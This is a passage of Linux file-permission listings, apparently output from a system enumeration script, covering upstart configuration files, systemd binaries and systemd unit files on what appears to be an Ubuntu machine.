-rw-r--r--   1 root root   261 Nov 18  2014 mountall-reboot.conf
-rw-r--r--   1 root root   311 Nov 18  2014 mountall.sh.conf
-rw-r--r--   1 root root  1201 Nov 18  2014 mountall-shell.conf
-rw-r--r--   1 root root   327 Nov 18  2014 mountdevsubfs.sh.conf
-rw-r--r--   1 root root   405 Nov 18  2014 mounted-debugfs.conf
-rw-r--r--   1 root root   730 Nov 18  2014 mounted-dev.conf
-rw-r--r--   1 root root   536 Nov 18  2014 mounted-proc.conf
-rw-r--r--   1 root root   618 Nov 18  2014 mounted-run.conf
-rw-r--r--   1 root root  1890 Nov 18  2014 mounted-tmp.conf
-rw-r--r--   1 root root   903 Nov 18  2014 mounted-var.conf
-rw-r--r--   1 root root   323 Nov 18  2014 mountkernfs.sh.conf
-rw-r--r--   1 root root   249 Nov 18  2014 mountnfs-bootclean.sh.conf
-rw-r--r--   1 root root   313 Nov 18  2014 mountnfs.sh.conf
-rw-r--r--   1 root root   238 Nov 18  2014 mtab.sh.conf
-rw-r--r--   1 root root  2493 Jun  2  2015 networking.conf
-rw-r--r--   1 root root   933 Jun  2  2015 network-interface.conf
-rw-r--r--   1 root root   530 Jun  2  2015 network-interface-container.conf
-rw-r--r--   1 root root  1756 Jun  2  2015 network-interface-security.conf
-rw-r--r--   1 root root   568 Jan 11  2017 network-manager.conf
-rw-r--r--   1 root root   568 Feb  1  2016 passwd.conf
-rw-r--r--   1 root root   119 Jun  5  2014 procps.conf
-rw-r--r--   1 root root   363 Jun  5  2014 procps-instance.conf
-rw-r--r--   1 root root   661 May 19  2016 rc.conf
-rw-r--r--   1 root root   683 May 19  2016 rcS.conf
-rw-r--r--   1 root root  1543 May 19  2016 rc-sysinit.conf
-rw-r--r--   1 root root   457 Jun  3  2015 resolvconf.conf
-rw-r--r--   1 root root   365 Nov  2  2014 rfkill-restore.conf
-rw-r--r--   1 root root   357 Nov  2  2014 rfkill-store.conf
-rw-r--r--   1 root root   426 Dec  2  2015 rsyslog.conf
-rw-r--r--   1 root root   230 Apr  4  2016 setvtrgb.conf
-rw-r--r--   1 root root   277 May 19  2016 shutdown.conf
-rw-r--r--   1 root root   641 Apr 13  2016 ssh.conf
-rw-r--r--   1 root root   360 Apr 18  2017 thermald.conf
-rw-r--r--   1 root root   348 May 19  2016 tty1.conf
-rw-r--r--   1 root root   333 May 19  2016 tty2.conf
-rw-r--r--   1 root root   333 May 19  2016 tty3.conf
-rw-r--r--   1 root root   333 May 19  2016 tty4.conf
-rw-r--r--   1 root root   232 May 19  2016 tty5.conf
-rw-r--r--   1 root root   232 May 19  2016 tty6.conf
-rw-r--r--   1 root root   337 Apr 12  2016 udev.conf
-rw-r--r--   1 root root   360 Apr 12  2016 udevmonitor.conf
-rw-r--r--   1 root root   352 Apr 12  2016 udevtrigger.conf
-rw-r--r--   1 root root   473 Aug  7  2014 ufw.conf
-rw-r--r--   1 root root   412 May 19  2016 upstart-file-bridge.conf
-rw-r--r--   1 root root   329 May 19  2016 upstart-socket-bridge.conf
-rw-r--r--   1 root root   553 May 19  2016 upstart-udev-bridge.conf
-rw-r--r--   1 root root   889 Feb 24  2015 ureadahead.conf
-rw-r--r--   1 root root   683 Feb 24  2015 ureadahead-other.conf
-rw-r--r--   1 root root   141 Oct  5  2015 usb-modeswitch-upstart.conf
-rw-r--r--   1 root root  1521 May 19  2016 wait-for-state.conf
-rw-r--r--   1 root root   453 Jul 27  2017 whoopsie.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 8.3M
drwxr-xr-x 30 root root  20K Jul 21 10:44 system
drwxr-xr-x  2 root root 4.0K Jul 21 10:44 system-generators
drwxr-xr-x  2 root root 4.0K Feb 26  2019 system-sleep
drwxr-xr-x  2 root root 4.0K Feb 26  2019 network
drwxr-xr-x  2 root root 4.0K Feb 26  2019 system-preset
-rwxr-xr-x  1 root root 443K Feb 13  2019 systemd-udevd
-rwxr-xr-x  1 root root 268K Feb 13  2019 systemd-cgroups-agent
-rwxr-xr-x  1 root root 301K Feb 13  2019 systemd-fsck
-rwxr-xr-x  1 root root 276K Feb 13  2019 systemd-initctl
-rwxr-xr-x  1 root root 340K Feb 13  2019 systemd-localed
-rwxr-xr-x  1 root root  51K Feb 13  2019 systemd-modules-load
-rwxr-xr-x  1 root root  35K Feb 13  2019 systemd-user-sessions
-rwxr-xr-x  1 root root 1.6M Feb 13  2019 systemd
-rwxr-xr-x  1 root root  15K Feb 13  2019 systemd-ac-power
-rwxr-xr-x  1 root root 103K Feb 13  2019 systemd-bootchart
-rwxr-xr-x  1 root root  91K Feb 13  2019 systemd-cryptsetup
-rwxr-xr-x  1 root root  31K Feb 13  2019 systemd-hibernate-resume
-rwxr-xr-x  1 root root 332K Feb 13  2019 systemd-hostnamed
-rwxr-xr-x  1 root root 319K Feb 13  2019 systemd-journald
-rwxr-xr-x  1 root root 123K Feb 13  2019 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  35K Feb 13  2019 systemd-quotacheck
-rwxr-xr-x  1 root root  51K Feb 13  2019 systemd-remount-fs
-rwxr-xr-x  1 root root  91K Feb 13  2019 systemd-rfkill
-rwxr-xr-x  1 root root 143K Feb 13  2019 systemd-shutdown
-rwxr-xr-x  1 root root  71K Feb 13  2019 systemd-sleep
-rwxr-xr-x  1 root root  91K Feb 13  2019 systemd-socket-proxyd
-rwxr-xr-x  1 root root  55K Feb 13  2019 systemd-sysctl
-rwxr-xr-x  1 root root 333K Feb 13  2019 systemd-timedated
-rwxr-xr-x  1 root root 139K Feb 13  2019 systemd-timesyncd
-rwxr-xr-x  1 root root  55K Feb 13  2019 systemd-activate
-rwxr-xr-x  1 root root  91K Feb 13  2019 systemd-backlight
-rwxr-xr-x  1 root root  47K Feb 13  2019 systemd-binfmt
-rwxr-xr-x  1 root root 352K Feb 13  2019 systemd-bus-proxyd
-rwxr-xr-x  1 root root  75K Feb 13  2019 systemd-fsckd
-rwxr-xr-x  1 root root 605K Feb 13  2019 systemd-logind
-rwxr-xr-x  1 root root 836K Feb 13  2019 systemd-networkd
-rwxr-xr-x  1 root root  39K Feb 13  2019 systemd-random-seed
-rwxr-xr-x  1 root root  31K Feb 13  2019 systemd-reply-password
-rwxr-xr-x  1 root root 657K Feb 13  2019 systemd-resolved
-rwxr-xr-x  1 root root 276K Feb 13  2019 systemd-update-utmp
-rwxr-xr-x  1 root root 1.3K Nov 15  2018 systemd-sysv-install
drwxr-xr-x  2 root root 4.0K Apr 12  2016 system-shutdown

/lib/systemd/system:
total 1.1M
drwxr-xr-x 2 root root 4.0K Jul 21 10:44 apache2.service.d
lrwxrwxrwx 1 root root    9 Jun 18 10:03 x11-common.service -> /dev/null
lrwxrwxrwx 1 root root   21 Jun 18 10:03 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root    9 Jun 18 10:03 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root   27 Jun 18 10:03 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root   15 Jun 18 10:03 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root   13 Jun 18 10:03 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root   17 Jun 18 10:03 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jun 18 10:03 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root   17 Jun 18 10:03 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root   16 Jun 18 10:03 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root   13 Jun 18 10:03 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root    9 Jun 18 10:03 saned.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 sendsigs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 single.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root   28 Jun 18 10:03 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root    9 Jun 18 10:03 motd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 mountall.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root   22 Jun 18 10:03 network-manager.service -> NetworkManager.service
lrwxrwxrwx 1 root root   27 Jun 18 10:03 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root   21 Jun 18 10:03 plymouth.service -> plymouth-quit.service
lrwxrwxrwx 1 root root   22 Jun 18 10:03 procps.service -> systemd-sysctl.service
lrwxrwxrwx 1 root root   16 Jun 18 10:03 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root    9 Jun 18 10:03 rc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 rcS.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 reboot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 fuse.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root   28 Jun 18 10:03 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root   14 Jun 18 10:03 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Jun 18 10:03 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Jun 18 10:03 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Jun 18 10:03 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Jun 18 10:03 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Jun 18 10:03 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Jun 18 10:03 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Jun 18 10:03 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root   24 Jun 18 10:03 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root   25 Jun 18 10:03 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Jun 18 10:03 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 Jun 18 10:03 alsa-utils.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Feb 26  2019 display-manager.service.d
drwxr-xr-x 2 root root 4.0K Feb 26  2019 system-update.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 basic.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 halt.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 getty.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 rc-local.service.d
drwxr-xr-x 2 root root 4.0K Feb 26  2019 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 resolvconf.service.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 sigpwr.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Feb 26  2019 timers.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 busnames.target.wants
drwxr-xr-x 2 root root 4.0K Feb 26  2019 systemd-resolved.service.d
-rw-r--r-- 1 root root  879 Feb 13  2019 basic.target
-rw-r--r-- 1 root root  379 Feb 13  2019 bluetooth.target
-rw-r--r-- 1 root root  358 Feb 13  2019 busnames.target
-rw-r--r-- 1 root root  770 Feb 13  2019 console-getty.service
-rw-r--r-- 1 root root  742 Feb 13  2019 console-shell.service
-rw-r--r-- 1 root root  791 Feb 13  2019 container-getty@.service
-rw-r--r-- 1 root root  394 Feb 13  2019 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Feb 13  2019 cryptsetup.target
-rw-r--r-- 1 root root 1010 Feb 13  2019 debug-shell.service
-rw-r--r-- 1 root root  670 Feb 13  2019 dev-hugepages.mount
-rw-r--r-- 1 root root  624 Feb 13  2019 dev-mqueue.mount
-rw-r--r-- 1 root root 1009 Feb 13  2019 emergency.service
-rw-r--r-- 1 root root  431 Feb 13  2019 emergency.target
-rw-r--r-- 1 root root  501 Feb 13  2019 exit.target
-rw-r--r-- 1 root root  440 Feb 13  2019 final.target
-rw-r--r-- 1 root root 1.5K Feb 13  2019 getty@.service
-rw-r--r-- 1 root root  460 Feb 13  2019 getty.target
-rw-r--r-- 1 root root  558 Feb 13  2019 graphical.target
-rw-r--r-- 1 root root  487 Feb 13  2019 halt.target
-rw-r--r-- 1 root root  447 Feb 13  2019 hibernate.target
-rw-r--r-- 1 root root  468 Feb 13  2019 hybrid-sleep.target
-rw-r--r-- 1 root root  630 Feb 13  2019 initrd-cleanup.service
-rw-r--r-- 1 root root  553 Feb 13  2019 initrd-fs.target
-rw-r--r-- 1 root root  790 Feb 13  2019 initrd-parse-etc.service
-rw-r--r-- 1 root root  526 Feb 13  2019 initrd-root-fs.target
-rw-r--r-- 1 root root  640 Feb 13  2019 initrd-switch-root.service
-rw-r--r-- 1 root root  691 Feb 13  2019 initrd-switch-root.target
-rw-r--r-- 1 root root  671 Feb 13  2019 initrd.target
-rw-r--r-- 1 root root  664 Feb 13  2019 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  501 Feb 13  2019 kexec.target
-rw-r--r-- 1 root root  677 Feb 13  2019 kmod-static-nodes.service
-rw-r--r-- 1 root root  395 Feb 13  2019 local-fs-pre.target
-rw-r--r-- 1 root root  507 Feb 13  2019 local-fs.target
-rw-r--r-- 1 root root  405 Feb 13  2019 machine.slice
-rw-r--r-- 1 root root  473 Feb 13  2019 mail-transport-agent.target
-rw-r--r-- 1 root root  492 Feb 13  2019 multi-user.target
-rw-r--r-- 1 root root  464 Feb 13  2019 network-online.target
-rw-r--r-- 1 root root  461 Feb 13  2019 network-pre.target
-rw-r--r-- 1 root root  480 Feb 13  2019 network.target
-rw-r--r-- 1 root root  514 Feb 13  2019 nss-lookup.target
-rw-r--r-- 1 root root  473 Feb 13  2019 nss-user-lookup.target
-rw-r--r-- 1 root root  354 Feb 13  2019 paths.target
-rw-r--r-- 1 root root  552 Feb 13  2019 poweroff.target
-rw-r--r-- 1 root root  377 Feb 13  2019 printer.target
-rw-r--r-- 1 root root  693 Feb 13  2019 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Feb 13  2019 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  568 Feb 13  2019 quotaon.service
-rw-r--r-- 1 root root  612 Feb 13  2019 rc-local.service
-rw-r--r-- 1 root root  543 Feb 13  2019 reboot.target
-rw-r--r-- 1 root root  396 Feb 13  2019 remote-fs-pre.target
-rw-r--r-- 1 root root  482 Feb 13  2019 remote-fs.target
-rw-r--r-- 1 root root  978 Feb 13  2019 rescue.service
-rw-r--r-- 1 root root  486 Feb 13  2019 rescue.target
-rw-r--r-- 1 root root  500 Feb 13  2019 rpcbind.target
-rw-r--r-- 1 root root 1.1K Feb 13  2019 serial-getty@.service
-rw-r--r-- 1 root root  402 Feb 13  2019 shutdown.target
-rw-r--r-- 1 root root  362 Feb 13  2019 sigpwr.target
-rw-r--r-- 1 root root  420 Feb 13  2019 sleep.target
-rw-r--r-- 1 root root  403 Feb 13  2019 -.slice
-rw-r--r-- 1 root root  409 Feb 13  2019 slices.target
-rw-r--r-- 1 root root  380 Feb 13  2019 smartcard.target
-rw-r--r-- 1 root root  356 Feb 13  2019 sockets.target
-rw-r--r-- 1 root root  380 Feb 13  2019 sound.target
-rw-r--r-- 1 root root  441 Feb 13  2019 suspend.target
-rw-r--r-- 1 root root  353 Feb 13  2019 swap.target
-rw-r--r-- 1 root root  715 Feb 13  2019 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  518 Feb 13  2019 sysinit.target
-rw-r--r-- 1 root root  719 Feb 13  2019 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Feb 13  2019 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.3K Feb 13  2019 syslog.socket
-rw-r--r-- 1 root root  646 Feb 13  2019 systemd-ask-password-console.path
-rw-r--r-- 1 root root  653 Feb 13  2019 systemd-ask-password-console.service
-rw-r--r-- 1 root root  574 Feb 13  2019 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  681 Feb 13  2019 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  724 Feb 13  2019 systemd-backlight@.service
-rw-r--r-- 1 root root  959 Feb 13  2019 systemd-binfmt.service
-rw-r--r-- 1 root root  650 Feb 13  2019 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Feb 13  2019 systemd-bus-proxyd.service
-rw-r--r-- 1 root root  409 Feb 13  2019 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root  497 Feb 13  2019 systemd-exit.service
-rw-r--r-- 1 root root  551 Feb 13  2019 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Feb 13  2019 systemd-fsckd.socket
-rw-r--r-- 1 root root  674 Feb 13  2019 systemd-fsck-root.service
-rw-r--r-- 1 root root  648 Feb 13  2019 systemd-fsck@.service
-rw-r--r-- 1 root root  544 Feb 13  2019 systemd-halt.service
-rw-r--r-- 1 root root  631 Feb 13  2019 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  501 Feb 13  2019 systemd-hibernate.service
-rw-r--r-- 1 root root  710 Feb 13  2019 systemd-hostnamed.service
-rw-r--r-- 1 root root  778 Feb 13  2019 systemd-hwdb-update.service
-rw-r--r-- 1 root root  519 Feb 13  2019 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 Feb 13  2019 systemd-initctl.service
-rw-r--r-- 1 root root  524 Feb 13  2019 systemd-initctl.socket
-rw-r--r-- 1 root root  607 Feb 13  2019 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Feb 13  2019 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 1.3K Feb 13  2019 systemd-journald.service
-rw-r--r-- 1 root root  842 Feb 13  2019 systemd-journald.socket
-rw-r--r-- 1 root root  731 Feb 13  2019 systemd-journal-flush.service
-rw-r--r-- 1 root root  557 Feb 13  2019 systemd-kexec.service
-rw-r--r-- 1 root root  691 Feb 13  2019 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Feb 13  2019 systemd-logind.service
-rw-r--r-- 1 root root  693 Feb 13  2019 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  967 Feb 13  2019 systemd-modules-load.service
-rw-r--r-- 1 root root 1.3K Feb 13  2019 systemd-networkd.service
-rw-r--r-- 1 root root  591 Feb 13  2019 systemd-networkd.socket
-rw-r--r-- 1 root root  685 Feb 13  2019 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root  553 Feb 13  2019 systemd-poweroff.service
-rw-r--r-- 1 root root  614 Feb 13  2019 systemd-quotacheck.service
-rw-r--r-- 1 root root  717 Feb 13  2019 systemd-random-seed.service
-rw-r--r-- 1 root root  548 Feb 13  2019 systemd-reboot.service
-rw-r--r-- 1 root root  757 Feb 13  2019 systemd-remount-fs.service
-rw-r--r-- 1 root root  907 Feb 13  2019 systemd-resolved.service
-rw-r--r-- 1 root root  696 Feb 13  2019 systemd-rfkill.service
-rw-r--r-- 1 root root  617 Feb 13  2019 systemd-rfkill.socket
-rw-r--r-- 1 root root  497 Feb 13  2019 systemd-suspend.service
-rw-r--r-- 1 root root  653 Feb 13  2019 systemd-sysctl.service
-rw-r--r-- 1 root root  655 Feb 13  2019 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Feb 13  2019 systemd-timesyncd.service
-rw-r--r-- 1 root root  598 Feb 13  2019 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  450 Feb 13  2019 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  703 Feb 13  2019 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  683 Feb 13  2019 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  578 Feb 13  2019 systemd-udevd-control.socket
-rw-r--r-- 1 root root  570 Feb 13  2019 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  825 Feb 13  2019 systemd-udevd.service
-rw-r--r-- 1 root root  823 Feb 13  2019 systemd-udev-settle.service
-rw-r--r-- 1 root root  743 Feb 13  2019 systemd-udev-trigger.service
-rw-r--r-- 1 root root  757 Feb 13  2019 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  754 Feb 13  2019 systemd-update-utmp.service
-rw-r--r-- 1 root root  573 Feb 13  2019 systemd-user-sessions.service
-rw-r--r-- 1 root root  436 Feb 13  2019 system.slice
-rw-r--r-- 1 root root  585 Feb 13  2019 system-update.target
-rw-r--r-- 1 root root  405 Feb 13  2019 timers.target
-rw-r--r-- 1 root root  395 Feb 13  2019 time-sync.target
-rw-r--r-- 1 root root  417 Feb 13  2019 umount.target
-rw-r--r-- 1 root root  528 Feb 13  2019 user@.service
-rw-r--r-- 1 root root  392 Feb 13  2019 user.slice
-rw-r--r-- 1 root root 1.1K Jan 30  2019 avahi-daemon.service
-rw-r--r-- 1 root root  874 Jan 30  2019 avahi-daemon.socket
-rw-r--r-- 1 root root  142 Dec 12  2018 cups.path
-rw-r--r-- 1 root root  175 Dec 12  2018 cups.service
-rw-r--r-- 1 root root  116 Dec 12  2018 cups.socket
-rw-r--r-- 1 root root  342 Nov 15  2018 getty-static.service
-rw-r--r-- 1 root root  153 Nov 15  2018 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root  175 Nov 15  2018 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root  715 Nov 15  2018 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root  364 Nov  2  2018 NetworkManager-dispatcher.service
-rw-r--r-- 1 root root  857 Nov  2  2018 NetworkManager.service
-rw-r--r-- 1 root root  303 Nov  2  2018 NetworkManager-wait-online.service
-rw-r--r-- 1 root root  225 Oct  9  2018 apt-daily.service
-rw-r--r-- 1 root root  156 Oct  9  2018 apt-daily.timer
-rw-r--r-- 1 root root  238 Oct  9  2018 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Oct  9  2018 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  618 Oct  2  2018 friendly-recovery.service
-rw-r--r-- 1 root root  172 Oct  2  2018 friendly-recovery.target
-rw-r--r-- 1 root root  211 Aug 17  2018 fwupd-offline-update.service
-rw-r--r-- 1 root root  355 Aug 17  2018 fwupd.service
-rw-r--r-- 1 root root  266 Aug  9  2018 wpa_supplicant.service
-rw-r--r-- 1 root root  246 May 24  2018 apport-forward.socket
-rw-r--r-- 1 root root  189 May 16  2018 uuidd.service
-rw-r--r-- 1 root root  126 May 16  2018 uuidd.socket
-rw-r--r-- 1 root root  412 May  9  2018 plymouth-halt.service
-rw-r--r-- 1 root root  426 May  9  2018 plymouth-kexec.service
-rw-r--r-- 1 root root  421 May  9  2018 plymouth-poweroff.service
-rw-r--r-- 1 root root  194 May  9  2018 plymouth-quit.service
-rw-r--r-- 1 root root  200 May  9  2018 plymouth-quit-wait.service
-rw-r--r-- 1 root root  244 May  9  2018 plymouth-read-write.service
-rw-r--r-- 1 root root  416 May  9  2018 plymouth-reboot.service
-rw-r--r-- 1 root root  532 May  9  2018 plymouth-start.service
-rw-r--r-- 1 root root  291 May  9  2018 plymouth-switch-root.service
-rw-r--r-- 1 root root  490 May  9  2018 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 May  9  2018 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  479 May  8  2018 run-vmblock-fuse.mount
-rw-r--r-- 1 root root  234 May  7  2018 cups-browsed.service
-rw-r--r-- 1 root root  328 Apr 19  2018 open-vm-tools.service
-rw-r--r-- 1 root root  298 Mar 22  2018 vgauth.service
-rw-r--r-- 1 root root  268 Jan 24  2018 ModemManager.service
-rw-r--r-- 1 root root  117 Jan 18  2018 fwupdate-cleanup.service
-rw-r--r-- 1 root root  420 Nov 29  2017 resolvconf.service
-rw-r--r-- 1 root root  384 Sep 11  2017 bluetooth.service
-rw-r--r-- 1 root root  253 Jul 27  2017 whoopsie.service
-rw-r--r-- 1 root root  167 Jul  6  2017 wacom-inputattach@.service
-rw-r--r-- 1 root root  345 Apr 20  2017 unattended-upgrades.service
-rw-r--r-- 1 root root  254 Apr 18  2017 thermald.service
-rw-r--r-- 1 root root  506 Mar 31  2017 lightdm.service
-rw-r--r-- 1 root root  239 Mar 10  2017 gpu-manager.service
-rw-r--r-- 1 root root  269 Jan 31  2017 setvtrgb.service
-rw-r--r-- 1 root root  491 Jan 12  2017 dbus.service
-rw-r--r-- 1 root root  106 Jan 12  2017 dbus.socket
-rw-r--r-- 1 root root  735 Nov 30  2016 networking.service
-rw-r--r-- 1 root root  497 Nov 30  2016 ifup@.service
-rw-r--r-- 1 root root  631 Nov  3  2016 accounts-daemon.service
-rw-r--r-- 1 root root  134 Aug 19  2016 failsafe-graphical.target
-rw-r--r-- 1 root root  232 Aug 19  2016 failsafe-x.service
-rw-r--r-- 1 root root  285 Jun 16  2016 keyboard-setup.service
-rw-r--r-- 1 root root  288 Jun 16  2016 console-setup.service
-rw-r--r-- 1 root root  451 Jun 15  2016 upower.service
-rw-r--r-- 1 root root  545 Apr 27  2016 brltty.service
-rw-r--r-- 1 root root  429 Apr 27  2016 brltty-udev.service
-rw-r--r-- 1 root root  510 Apr 14  2016 alsa-restore.service
-rw-r--r-- 1 root root  483 Apr 14  2016 alsa-state.service
-rw-r--r-- 1 root root  385 Apr 13  2016 ssh.service
-rw-r--r-- 1 root root  196 Apr 13  2016 ssh@.service
-rw-r--r-- 1 root root  216 Apr 13  2016 ssh.socket
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12  2016 runlevel5.target.wants
-rw-r--r-- 1 root root  234 Apr  8  2016 acpid.service
-rw-r--r-- 1 root root  251 Apr  5  2016 cron.service
-rw-r--r-- 1 root root  290 Apr  5  2016 rsyslog.service
-rw-r--r-- 1 root root  196 Apr  1  2016 udisks2.service
-rw-r--r-- 1 root root  142 Mar 31  2016 apport-forward@.service
-rw-r--r-- 1 root root  376 Mar 10  2016 kerneloops.service
-rw-r--r-- 1 root root  571 Mar  7  2016 udev-configure-printer@.service
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.socket
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.path
-rw-r--r-- 1 root root  207 Jan 27  2016 pppd-dns.service
-rw-r--r-- 1 root root  182 Jan 13  2016 polkitd.service
-rw-r--r-- 1 root root  183 Jan  4  2016 usbmuxd.service
-rw-r--r-- 1 root root  298 Nov  6  2015 colord.service
-rw-r--r-- 1 root root 1.1K Oct 25  2015 rtkit-daemon.service
-rw-r--r-- 1 root root  428 Oct 23  2015 dns-clean.service
-rw-r--r-- 1 root root  178 Oct  5  2015 usb_modeswitch@.service
-rw-r--r-- 1 root root  364 Aug  2  2015 fail2ban.service
-rw-r--r-- 1 root root  309 Apr 25  2015 saned@.service
-rw-r--r-- 1 root root  241 Mar  2  2015 ufw.service
-rw-r--r-- 1 root root  250 Feb 24  2015 ureadahead-stop.service
-rw-r--r-- 1 root root  242 Feb 24  2015 ureadahead-stop.timer
